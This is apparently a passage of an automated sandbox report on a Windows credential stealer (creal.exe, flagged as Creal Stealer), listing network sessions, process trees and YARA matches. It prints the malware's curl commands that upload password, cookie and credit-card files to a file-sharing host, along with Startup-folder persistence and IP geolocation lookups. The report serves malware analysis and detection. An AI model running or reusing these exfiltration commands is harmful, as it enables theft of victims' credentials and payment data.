Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2025-01-16 08:09:20 UTC | 747 | IN | Data Ascii: {"data":{"createTime":1737014960,"downloadPage":"https://gofile.io/d/wXGekI","guestToken":"469KWi6mdIH1yr7bGYDMV6hRzrTBYZnL","id":"9d5f524c-2270-4a99-9c65-6938fc0a398d","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1737014960,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49801 | 31.14.70.245 | 443 | 7608 | C:\Windows\System32\curl.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:21 UTC | 198 | OUT | POST /uploadFile HTTP/1.1
Host: store4.gofile.io
User-Agent: curl/7.83.1
Accept: */*
Content-Length: 466
Content-Type: multipart/form-data; boundary=------------------------6724afa5a35b96de
2025-01-16 08:09:21 UTC | 466 | OUT | Data Ascii: --------------------------6724afa5a35b96deContent-Disposition: form-data; name="file"; filename="crcookies.txt"Content-Type: text/plain.google.comTRUE/FALSE25975734561P_JAR2023-10-05-09.google.comTRUE/FALSE2597573456NID511=k9tT3q7Yfh
2025-01-16 08:09:21 UTC | 449 | IN | HTTP/1.1 200 OK
Server: nginx/1.27.1
Date: Thu, 16 Jan 2025 08:09:21 GMT
Content-Type: application/json
Content-Length: 437
Connection: close
Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2025-01-16 08:09:21 UTC | 437 | IN | Data Ascii: {"data":{"createTime":1737014961,"downloadPage":"https://gofile.io/d/qP6xXi","guestToken":"UV30y2BpqdrGzK61kdptxWMJTr7uI3Ov","id":"ad11b5e0-3540-4c52-9c1c-dbe2f40c7a09","md5":"58da1c4e7d7343d729004021ffae7c6a","mimetype":"text/tab-separated-values","modTi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49813 | 31.14.70.245 | 443 | 3720 | C:\Windows\System32\curl.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:22 UTC | 198 | OUT | POST /uploadFile HTTP/1.1
Host: store4.gofile.io
User-Agent: curl/7.83.1
Accept: */*
Content-Length: 195
Content-Type: multipart/form-data; boundary=------------------------a6eead71f8802286
2025-01-16 08:09:22 UTC | 195 | OUT | Data Ascii: --------------------------a6eead71f8802286Content-Disposition: form-data; name="file"; filename="crcreditcards.txt"Content-Type: text/plain--------------------------a6eead71f8802286--
2025-01-16 08:09:23 UTC | 449 | IN | HTTP/1.1 200 OK
Server: nginx/1.27.1
Date: Thu, 16 Jan 2025 08:09:23 GMT
Content-Type: application/json
Content-Length: 749
Connection: close
Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2025-01-16 08:09:23 UTC | 749 | IN | Data Ascii: {"data":{"createTime":1737014963,"downloadPage":"https://gofile.io/d/plrjGQ","guestToken":"m74DGlZCVWJbXpnalOps56XJevrJTAQn","id":"b34f4a90-38f8-47c6-81d2-783ce8422b8b","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1737014963,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49883 | 104.26.13.205 | 443 | 4992 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:34 UTC | 117 | OUT | GET / HTTP/1.1
Accept-Encoding: identity
Host: api.ipify.org
User-Agent: Python-urllib/3.12
Connection: close
2025-01-16 08:09:34 UTC | 425 | IN | HTTP/1.1 200 OK
Date: Thu, 16 Jan 2025 08:09:34 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 902c9fc83ab654af-YYZ
server-timing: cfL4;desc="?proto=TCP&rtt=14414&min_rtt=14402&rtt_var=5426&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=709&delivery_rate=201309&cwnd=32&unsent_bytes=0&cid=f9251ab33dc5c09b&ts=194&x=0"
2025-01-16 08:09:34 UTC | 12 | IN | Data Ascii: 8.46.123.189


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              7192.168.2.94988945.112.123.1264434992C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2025-01-16 08:09:35 UTC126OUTGET /getServer HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: api.gofile.io
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
2025-01-16 08:09:35 UTC | 1146 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:35 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 14
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                              Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                              Origin-Agent-Cluster: ?1
                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                              X-DNS-Prefetch-Control: off
                                                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                              ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow
2025-01-16 08:09:35 UTC | 14 | IN | Data Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                                                                                                                              Data Ascii: error-notFound


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49895 | 159.89.102.253 | 443 | 4992 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:36 UTC | 140 | OUT | GET /jsonp/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: geolocation-db.com
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
2025-01-16 08:09:36 UTC | 206 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:36 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
2025-01-16 08:09:36 UTC | 172 | IN |
                                                                                                                                                                                                              Data Ascii: a1callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.189","state":null})0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49911 | 31.14.70.245 | 443 | 3480 | C:\Windows\System32\curl.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:38 UTC | 198 | OUT | POST /uploadFile HTTP/1.1
                                                                                                                                                                                                              Host: store4.gofile.io
                                                                                                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------2b19bbf9df8f9a94
2025-01-16 08:09:38 UTC | 193 | OUT |
                                                                                                                                                                                                              Data Ascii: --------------------------2b19bbf9df8f9a94Content-Disposition: form-data; name="file"; filename="crpasswords.txt"Content-Type: text/plain--------------------------2b19bbf9df8f9a94--
2025-01-16 08:09:38 UTC | 449 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:38 GMT
                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                              Content-Length: 747
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2025-01-16 08:09:38 UTC | 747 | IN |
                                                                                                                                                                                                              Data Ascii: {"data":{"createTime":1737014978,"downloadPage":"https://gofile.io/d/n4OslB","guestToken":"0PXN9M1Dp1CrreOTrYOsH1vaFDaQGVHj","id":"85a7a930-cb65-4f66-a799-42e79ff3b32d","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1737014978,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49921 | 31.14.70.245 | 443 | 1080 | C:\Windows\System32\curl.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:39 UTC | 198 | OUT | POST /uploadFile HTTP/1.1
                                                                                                                                                                                                              Host: store4.gofile.io
                                                                                                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              Content-Length: 466
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------e82318e3899d8f43
2025-01-16 08:09:39 UTC | 466 | OUT |
                                                                                                                                                                                                              Data Ascii: --------------------------e82318e3899d8f43Content-Disposition: form-data; name="file"; filename="crcookies.txt"Content-Type: text/plain.google.comTRUE/FALSE25975734561P_JAR2023-10-05-09.google.comTRUE/FALSE2597573456NID511=k9tT3q7Yfh
2025-01-16 08:09:40 UTC | 449 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:40 GMT
                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                              Content-Length: 437
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2025-01-16 08:09:40 UTC | 437 | IN |
                                                                                                                                                                                                              Data Ascii: {"data":{"createTime":1737014980,"downloadPage":"https://gofile.io/d/b2HV08","guestToken":"fy7mRmG7VpsyGIsnFJzaAcnlGusKXwzn","id":"ae6c882e-ddb4-4369-a09b-e04931932cf2","md5":"58da1c4e7d7343d729004021ffae7c6a","mimetype":"text/tab-separated-values","modTi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49934 | 31.14.70.245 | 443 | 2024 | C:\Windows\System32\curl.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:42 UTC | 198 | OUT | POST /uploadFile HTTP/1.1
                                                                                                                                                                                                              Host: store4.gofile.io
                                                                                                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              Content-Length: 195
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------cd5f239849a3a26e
2025-01-16 08:09:42 UTC | 195 | OUT |
                                                                                                                                                                                                              Data Ascii: --------------------------cd5f239849a3a26eContent-Disposition: form-data; name="file"; filename="crcreditcards.txt"Content-Type: text/plain--------------------------cd5f239849a3a26e--
2025-01-16 08:09:43 UTC | 449 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:42 GMT
                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                              Content-Length: 749
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2025-01-16 08:09:43 UTC 749 IN
                                                                                                                                                                                                              Data Ascii: {"data":{"createTime":1737014982,"downloadPage":"https://gofile.io/d/jGlF1N","guestToken":"KmNW5Yir6zVc0kvRtpNfNV8rWCfZ76Fs","id":"e7236d5d-b269-4ef9-8873-0dadfdbf9245","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1737014982,



                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:03:09:09
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\creal.exe"
                                                                                                                                                                                                              Imagebase:0x7ff67a600000
                                                                                                                                                                                                              File size:17'171'619 bytes
                                                                                                                                                                                                              MD5 hash:DA1695DBA8BD25D00E05E7769D6D7E8E
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                              Start time:03:09:12
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\creal.exe"
                                                                                                                                                                                                              Imagebase:0x7ff67a600000
                                                                                                                                                                                                              File size:17'171'619 bytes
                                                                                                                                                                                                              MD5 hash:DA1695DBA8BD25D00E05E7769D6D7E8E
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1530242051.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1506165356.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000002.1570834386.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1551554678.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1535265611.00000185BBDD4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1506829823.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1514358388.00000185BBDA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1546407514.00000185BBDF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1552635462.00000185BC84E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000002.1570617892.00000185BC84E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1526078196.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1531149169.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1546301683.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1520628565.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1520628565.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1534840732.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1516736251.00000185BBDD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1514920740.00000185BBDBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1542555830.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1551628084.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                              Start time:03:09:13
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                              Start time:03:09:13
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:03:09:13
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                              Imagebase:0x7ff7df590000
                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                              Start time:03:09:18
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                              Start time:03:09:18
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                              Start time:03:09:18
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                              Start time:03:09:19
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:03:09:19
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                              Start time:03:09:19
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                              Start time:03:09:21
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                              Start time:03:09:21
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
